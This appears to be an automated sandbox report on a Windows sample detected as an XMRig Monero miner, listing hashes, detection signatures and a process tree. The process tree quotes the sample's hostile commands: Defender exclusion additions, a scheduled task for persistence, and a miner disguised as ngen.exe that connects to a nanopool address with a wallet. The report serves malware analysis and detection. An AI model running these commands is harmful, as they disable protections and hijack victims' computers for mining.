Analysis
- max time kernel: 52s
- max time network: 111s
- platform: windows7_x64
- resource: win7-20230703-en
- resource tags: arch:x64, arch:x86, image:win7-20230703-en, locale:en-us, os:windows7-x64, system
- submitted: 04/07/2023, 21:24
Static task: static1
Behavioral task: behavioral1 (sample: file.exe, resource: win7-20230703-en)
Behavioral task: behavioral2 (sample: file.exe, resource: win10v2004-20230703-en)
General
- Target: file.exe
- Size: 2.3MB
- MD5: cdce958317e838eb09ec7e678ba1995c
- SHA1: 30d5a9b4f1083e2f188b7ce2d2c24fd63c0b413b
- SHA256: 9dca904c03551d33f96618bae69cb43811bd5072826ead4e1b7072229451a376
- SHA512: 79e021418a99c5ed38a0995887b9bd7711bbe9b299113c76a87f02eb111c9211c350b7d5b2580ca40a81bd110d53a899a11c4b9e61e3338b90ac4ab84dae81f2
- SSDEEP: 49152:OlJiXsQqb2AkydMeCL9+feqU9QWsNNHrT:OH7dj3O8mqkQNNHrT
Malware Config
Signatures
- XMRig Miner payload (10 IoCs)
  resource / yara_rule:
  behavioral1/memory/2836-123-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig
  behavioral1/memory/2836-124-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig
  behavioral1/memory/2836-125-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig
  behavioral1/memory/2836-126-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig
  behavioral1/memory/2836-127-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig
  behavioral1/memory/2836-128-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig
  behavioral1/memory/2836-129-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig
  behavioral1/memory/2836-130-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig
  behavioral1/memory/2836-132-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig
  behavioral1/memory/2836-134-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig
- Executes dropped EXE (1 IoC)
  pid 2420, process ELRX.exe
- Loads dropped DLL (1 IoC)
  pid 2128, process cmd.exe
- Creates scheduled task(s) (1 TTP, 1 IoC)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid 2500, process schtasks.exe
- Delays execution with timeout.exe (1 IoC)
  pid 2224, process timeout.exe
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  pid 2340, process powershell.exe
  pid 2344, process powershell.exe
- Suspicious use of AdjustPrivilegeToken (4 IoCs)
  Token: SeDebugPrivilege, pid 3064, process file.exe
  Token: SeDebugPrivilege, pid 2340, process powershell.exe
  Token: SeDebugPrivilege, pid 2344, process powershell.exe
  Token: SeDebugPrivilege, pid 2420, process ELRX.exe
- Suspicious use of WriteProcessMemory (21 IoCs)
  description | pid | process | procid_target
  PID 3064 wrote to memory of 2340 | 3064 | file.exe | 28
  PID 3064 wrote to memory of 2340 | 3064 | file.exe | 28
  PID 3064 wrote to memory of 2340 | 3064 | file.exe | 28
  PID 3064 wrote to memory of 2344 | 3064 | file.exe | 29
  PID 3064 wrote to memory of 2344 | 3064 | file.exe | 29
  PID 3064 wrote to memory of 2344 | 3064 | file.exe | 29
  PID 3064 wrote to memory of 2128 | 3064 | file.exe | 32
  PID 3064 wrote to memory of 2128 | 3064 | file.exe | 32
  PID 3064 wrote to memory of 2128 | 3064 | file.exe | 32
  PID 2128 wrote to memory of 2224 | 2128 | cmd.exe | 34
  PID 2128 wrote to memory of 2224 | 2128 | cmd.exe | 34
  PID 2128 wrote to memory of 2224 | 2128 | cmd.exe | 34
  PID 2128 wrote to memory of 2420 | 2128 | cmd.exe | 35
  PID 2128 wrote to memory of 2420 | 2128 | cmd.exe | 35
  PID 2128 wrote to memory of 2420 | 2128 | cmd.exe | 35
  PID 2420 wrote to memory of 272 | 2420 | ELRX.exe | 36
  PID 2420 wrote to memory of 272 | 2420 | ELRX.exe | 36
  PID 2420 wrote to memory of 272 | 2420 | ELRX.exe | 36
  PID 2420 wrote to memory of 2056 | 2420 | ELRX.exe | 37
  PID 2420 wrote to memory of 2056 | 2420 | ELRX.exe | 37
  PID 2420 wrote to memory of 2056 | 2420 | ELRX.exe | 37
Processes (indentation shows the process tree; the level number is the depth reported by the sandbox)
- C:\Users\Admin\AppData\Local\Temp\file.exe (level 1, PID 3064)
  Command line: "C:\Users\Admin\AppData\Local\Temp\file.exe"
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (level 2, PID 2340)
    Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (level 2, PID 2344)
    Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\cmd.exe (level 2, PID 2128)
    Command line: cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpC9A6.tmp.bat""
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\timeout.exe (level 3, PID 2224)
      Command line: timeout 3
      - Delays execution with timeout.exe
    - C:\ProgramData\CodeShorts\ELRX.exe (level 3, PID 2420)
      Command line: "C:\ProgramData\CodeShorts\ELRX.exe"
      - Executes dropped EXE
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (level 4, PID 272)
        Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (level 4, PID 2056)
        Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
      - C:\Windows\System32\cmd.exe (level 4, PID 2792)
        Command line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "ELRX" /tr "C:\ProgramData\CodeShorts\ELRX.exe"
        - C:\Windows\system32\schtasks.exe (level 5, PID 2500)
          Command line: schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "ELRX" /tr "C:\ProgramData\CodeShorts\ELRX.exe"
          - Creates scheduled task(s)
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe (level 4, PID 2836)
        Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe -o xmr-eu1.nanopool.org:14433 -u 87N2CazJHoaY8ofHfhpKfj2SGmfMDHPXkgZNgeArkrabCc8vC81NNzxdN6Rjfemw5TGmZ2vbDrC6wDxqdGf7eqqYVBUpMZD --tls --coin monero --max-cpu-usage=50 --donate-level=1 -opencl
Network
MITRE ATT&CK Enterprise v6
Downloads
- Filesize: 454.8MB
  MD5: fc3a940f31e120d3647eea5464d74e5e
  SHA1: 62eed506d02e5ed69b45fa8262c5515ba76d808a
  SHA256: 4dbdb7dce3e2d343ec68f73db4e28e8e9cae1b4b23bf11a232aa68b952ba12b1
  SHA512: 72f4ccd7b43cd4af9be5c55efcccf825f72dd75dfe6085ef63a04c4c1907ddde113a2155fbe17e741a7b3460d45a4616e999c8de668c0390d2d8b6c0f956613f
- Filesize: 474.7MB
  MD5: bd83c81b8aad4f15a80769a6cae57c6c
  SHA1: 58372e858c4283e89f5a70c8ac320b098ccb4a10
  SHA256: 19b61bc2efe992821b6330651ed1962348e8f3eff96ae84b73ca012f733f7e1d
  SHA512: 2a7678de13858319dcbc4ddf51be0fa960428615ea901d650dbabb3913d119bea18f196d1e619d24f40af4ca56446a3085edd5bc71ef15592a8f39364699889a
- Filesize: 143B
  MD5: 3e08c7e072304c9a7396e60232786cfb
  SHA1: 8e263d24d0aa0018b1fd4638dd8d412e1f5dbb7b
  SHA256: 5356f4c007b0fb69e585d50255ede6fe018e592cd12a9631fac5798e423b2903
  SHA512: 9ca4cfa0d21fffd787eddc324f05e8035b2ae0b0c11def07f7cc98d1fd2707a79db316b2355ce43a1bfadc1acd1043b05d2d4a3bb4f422c24306d8a36fe41994
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  Filesize: 7KB
  MD5: 38f0bb9781dfaaf163451ef776d7c653
  SHA1: 12e1a8022feb5efe1c6ef7d4a3c113c0685f6ece
  SHA256: 2e80dbb4093ffe7e6b6a35ffab461de4be1739feccb2752c9a7df7a95a0fae35
  SHA512: b3dabe8e7f873355d4c070c7c06eda02a1da40789f30ed6bd3c5db74fc228e1a530c8b774f0ff1cf36c117ba650fbcd8842a5d4a4899734f2327f847d2c486b3
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VEQW1HSWJ0HCS79ZSN9X.temp
  Filesize: 7KB
  MD5: 38f0bb9781dfaaf163451ef776d7c653
  SHA1: 12e1a8022feb5efe1c6ef7d4a3c113c0685f6ece
  SHA256: 2e80dbb4093ffe7e6b6a35ffab461de4be1739feccb2752c9a7df7a95a0fae35
  SHA512: b3dabe8e7f873355d4c070c7c06eda02a1da40789f30ed6bd3c5db74fc228e1a530c8b774f0ff1cf36c117ba650fbcd8842a5d4a4899734f2327f847d2c486b3
- Filesize: 456.7MB
  MD5: 68bd36b878d0844c77183077da155042
  SHA1: b687ea543dc337e98cea8240f4fab67d59bb07d0
  SHA256: 79b92404c90f4219182b12432756799321eeb3c5602995ecfb157a21d747a971
  SHA512: b5307210931c0845bda81f661ecc771915b387d0163a6d6efbdd60175657912131456b796f9c20ebcf7b50c3a6074fe98ae6b6457078f52850d42f4297ff6a0f